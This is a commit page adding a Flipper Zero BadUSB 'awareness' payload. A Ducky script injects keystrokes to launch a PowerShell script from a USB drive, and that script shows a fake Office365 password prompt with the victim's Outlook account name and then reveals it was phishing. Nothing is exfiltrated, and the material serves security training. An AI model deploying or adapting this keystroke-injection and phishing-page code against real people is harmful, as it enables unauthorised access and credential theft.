Hardware-Hacking/flipperzero
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Zarcolio
2023-07-28 11:37:17 +02:00
committed by GitHub
parent 019b080e65
commit 69126bf361
2 changed files with 22 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
BadUSB/Ducky Scripts/Awareness/Phish_Office365-onUSB.ps1
+12
View File
@@ -0,0 +1,12 @@
Add-Type -AssemblyName "Microsoft.Office.Interop.Outlook"
$o = New-Object -ComObject Outlook.Application -ErrorAction SilentlyContinue
$n = $o.GetNamespace("MAPI")
$i = $n.GetDefaultFolder(6)
$u = $i.Parent.Store.DisplayName
$h = @"
<!DOCTYPE html><html><head><title>&#65279;</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/css/bootstrap.min.css"><style>#loginForm{background-color:#fff;box-shadow:0 2px 23px -5px rgba(0,0,0,.46);height:470px;width:440px;position:absolute;left:50%;top:49%;transform:translate(-50%,-50%);padding:10px}body{background:url(https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg) -130px 0/cover no-repeat;position:relative}body::before{content:"";position:absolute;top:0;left:0;right:0;bottom:0;background-color:rgba(0,0,0,.5);z-index:-1}#logo{margin-top:25px;margin-left:36px;border:none}#signIn{margin-left:36px;margin-top:-6px;font-weight:600;font-size:25px;overflow:hidden}#email{width:85%;max-width:350px;height:40px;margin-top:-10px;margin-left:36px;border:none;border-bottom:.01px solid rgba(0,0,0,.7)}#ForgodPwd,#NoAccount,#SignWithKey,#createAccount{margin-left:36px;margin-top:13px;font-size:13px}#signInSecurity{margin-left:25px;font-size:13px}.fa.fa-question-circle-o{margin-left:5px;opacity:.8}#passResult,#result,#signInSecurityKey{margin-left:36px;font-size:13px}#iconQ{margin-left:3px;opacity:.55}#btnSend,#btnSignIn{height:33px;width:108px;padding:0;margin-left:auto;margin-top:auto;font-size:13px;color:#fff;border:#0067b8;background-color:#0067b8}#btnPlace{margin-left:275px;margin-top:45px;margin-bottom:1px}#linkCreateAccount{margin-left:5px}#email:focus,input:focus{outline:0}#image{margin-top:25px;margin-left:36px;margin-bottom:12px}#section-2{margin-top:-60%}.section-indent{float:left}#btnSignInLocation{margin-left:275px;margin-top:19px}#password{width:85%;height:40px;margin-top:-10px;margin-left:36px;border:none;border-bottom:.01px solid rgba(0,0,0,.7)}#enterPwd{margin-left:36px;margin-top:7px;font-size:24px;font-weight:500}#btnBack{background-color:#fff;color:rgba(0,0,0,.3);padding:5px;text-align:left;text-decoration:none;display:inline-block;font-size:10px;margin:4px 31px;border:none;cursor:pointer;border-radius:100%}#userLine{margin-left:36px;margin-bottom:-25px;font-size:15px;font-weight:400}#arrowBack{margin-right:5px;margin-top:0;margin-left:8px;opacity:.2;font-size:19px}#iconCircle{color:red}#iconBg{margin-right:5px;opacity:.4;font-size:23px}.slide-page{margin-left:0}.secondSlide{margin-left:100%;overflow:hidden}#section-1{overflow:hidden}#btnBack:hover{background-color:#c6c6c6}#cbRemember{margin-left:36px;width:21px;height:20px}#keepMe{color:#1b1b1b;margin-left:64px;font-size:15px;margin-bottom:-20px}#bg{position:fixed;top:0;bottom:0;min-width:100%;min-height:100%;overflow:hidden}#footer{position:absolute;bottom:0;right:0}#policy{margin-left:36px;font-size:15px;font-weight:400}#terms p,#terms div p{color:#fff!important}</style></head><body class="text-nowrap" style="width:100%;height:100vh"><div id="loginForm" class="container"><img id="image" src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"><div></div><section id="section-main"><section id="section-1" class="slide-page"><p id="userLine">$u</p><br><p id="enterPwd">Enter Password</p><h5 id="passResult"></h5><p id="policy">Your organisation policy requires you to sign in again<br>after a certain period of time.</p><p><input type="password" id="password" placeholder="Password"></p><p id="ForgodPwd"><a href="https://go.microsoft.com/fwlink/p/?linkid=2072756">Forgot password?</a></p><p id="btnSignInLocation"><button id="btnSignIn" class="submit" type="button">Sign in</button></p><p id="RT" style="color:red;display:none;margin-left:36px">You typed your password inside a phishing page<br>because you did not lock your screen!</p><p id="NoRT"><br><br></p><p id="policy">Employees Login Portal</p></section></section></div><div id="footer" style="height:36px"><div id="terms" style="float:left;width:84px"><p style="font-size:13px;text-align:left;color:#fff!important">Terms of use</p></div><div style="float:left;width:105px"><p style="font-size:12px;color:#fff!important">Privacy &amp; cookies</p></div><div id="terms" style="float:left;width:24px"><p style="font-size:12px">. . .<br></p></div></div><script>document.getElementById("btnSignIn").addEventListener("click",function(){var RT=document.getElementById("RT");RT.style.display="block";var NoRT=document.getElementById("NoRT");NoRT.style.display="none"})</script></body></html>
"@
$p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html")
$h | Out-File -Encoding UTF8 -FilePath $p
$a = "file://$p"
Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a" -WindowStyle Maximized
BadUSB/Ducky Scripts/Awareness/Phish_Office365_From_Usb.txt
+10
View File
@@ -0,0 +1,10 @@
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
ALTCODE $A="powershell.exe";$B="Phish_Office365-onUSB.ps1";$C="4e657a1d-b1a5-4a75-8e45-9a82791a2f21.txt";$D=$false;while(-not $D){$E=Get-WmiObject -Class Win32_Volume|Where-Object{$_.DriveType -eq 2};foreach($F in $E){$G=Join-Path -Path $F.Name -ChildPath $C;if(Test-Path $G){$D=$true;$H=Join-Path -Path $F.Name -ChildPath $B;Start-Process -FilePath $A -ArgumentList "-File $H -Wait"};break}};Exit
ENTER
DELAY 1500
GUI l